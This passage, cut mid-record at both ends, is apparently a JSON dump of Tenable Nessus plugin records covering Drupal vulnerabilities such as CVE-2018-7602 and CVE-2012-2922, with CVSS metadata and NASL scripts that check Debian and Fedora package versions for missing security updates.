fixed in version\n7.14-2+deb7u19.\n\nWe recommend that you upgrade your drupal7 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.debian.org/debian-lts-announce/2018/04/msg00030.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/wheezy/drupal7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the affected drupal7 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 7 SA-CORE-2018-004 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"drupal7\", reference:\"7.14-2+deb7u19\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:51:53", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.1.x < 8.5.3 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98577", "href": "https://www.tenable.com/plugins/was/98577", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:51:35", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 7.x < 7.59 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98579", "href": "https://www.tenable.com/plugins/was/98579", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:25:18", "description": "Fix for CVE-2012-2922, path disclosure vulnerability.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2012-06-04T00:00:00", "type": "nessus", "title": "Fedora 15 : drupal7-7.14-2.fc15 (2012-8360)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:drupal7", "cpe:/o:fedoraproject:fedora:15"], "id": "FEDORA_2012-8360.NASL", "href": "https://www.tenable.com/plugins/nessus/59340", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-8360.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59340);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-2922\");\n script_xref(name:\"FEDORA\", value:\"2012-8360\");\n\n script_name(english:\"Fedora 15 : drupal7-7.14-2.fc15 (2012-8360)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2012-2922, path disclosure vulnerability.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=824631\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=824632\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-June/081662.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?038256a4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected drupal7 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"drupal7-7.14-2.fc15\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal7\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T14:24:32", "description": "Fix for CVE-2012-2922, path disclosure vulnerability.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2012-06-04T00:00:00", "type": "nessus", "title": "Fedora 16 : drupal7-7.14-2.fc16 (2012-8362)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:drupal7", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2012-8362.NASL", "href": "https://www.tenable.com/plugins/nessus/59341", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-8362.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59341);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-2922\");\n script_xref(name:\"FEDORA\", value:\"2012-8362\");\n\n script_name(english:\"Fedora 16 : drupal7-7.14-2.fc16 (2012-8362)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2012-2922, path disclosure vulnerability.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=824631\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=824632\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-June/081661.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?929e9fe9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected drupal7 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"drupal7-7.14-2.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal7\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T14:24:40", "description": "Fix for CVE-2012-2922, path disclosure vulnerability.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2012-06-04T00:00:00", "type": "nessus", "title": "Fedora 17 : drupal7-7.14-2.fc17 (2012-8398)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:drupal7", "cpe:/o:fedoraproject:fedora:17"], "id": "FEDORA_2012-8398.NASL", "href": "https://www.tenable.com/plugins/nessus/59345", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-8398.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59345);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-2922\");\n script_xref(name:\"FEDORA\", value:\"2012-8398\");\n\n script_name(english:\"Fedora 17 : drupal7-7.14-2.fc17 (2012-8398)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2012-2922, path disclosure vulnerability.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=824631\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=824632\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-June/081721.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?299b8555\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected drupal7 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"drupal7-7.14-2.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal7\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T14:46:46", "description": "- https://www.drupal.org/project/drupal/releases/8.4.8\n\n - https://www.drupal.org/SA-CORE-2018-004\n\n- https://www.drupal.org/project/drupal/releases/8.4.7\n\n - https://www.drupal.org/sa-core-2018-003\n\nRPM update: `drupal8-rpmbuild` package dependencies fixed\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-01-03T00:00:00", "type": "nessus", "title": "Fedora 28 : drupal8 (2018-8fd924a53d) (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602", "CVE-2018-9861"], "modified": "2022-04-22T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:drupal8", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-8FD924A53D.NASL", "href": "https://www.tenable.com/plugins/nessus/120613", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-8fd924a53d.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120613);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/22\");\n\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\");\n script_xref(name:\"FEDORA\", value:\"2018-8fd924a53d\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n\n script_name(english:\"Fedora 28 : drupal8 (2018-8fd924a53d) (Drupalgeddon 2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"- https://www.drupal.org/project/drupal/releases/8.4.8\n\n - https://www.drupal.org/SA-CORE-2018-004\n\n- https://www.drupal.org/project/drupal/releases/8.4.7\n\n - https://www.drupal.org/sa-core-2018-003\n\nRPM update: `drupal8-rpmbuild` package dependencies fixed\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-8fd924a53d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected drupal8 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 7 SA-CORE-2018-004 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"drupal8-8.4.8-1.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal8\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:46:31", "description": "- https://www.drupal.org/project/drupal/releases/8.4.8\n\n - https://www.drupal.org/SA-CORE-2018-004\n\n- https://www.drupal.org/project/drupal/releases/8.4.7\n\n - https://www.drupal.org/sa-core-2018-003\n\nRPM update: `drupal8-rpmbuild` package dependencies fixed\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", 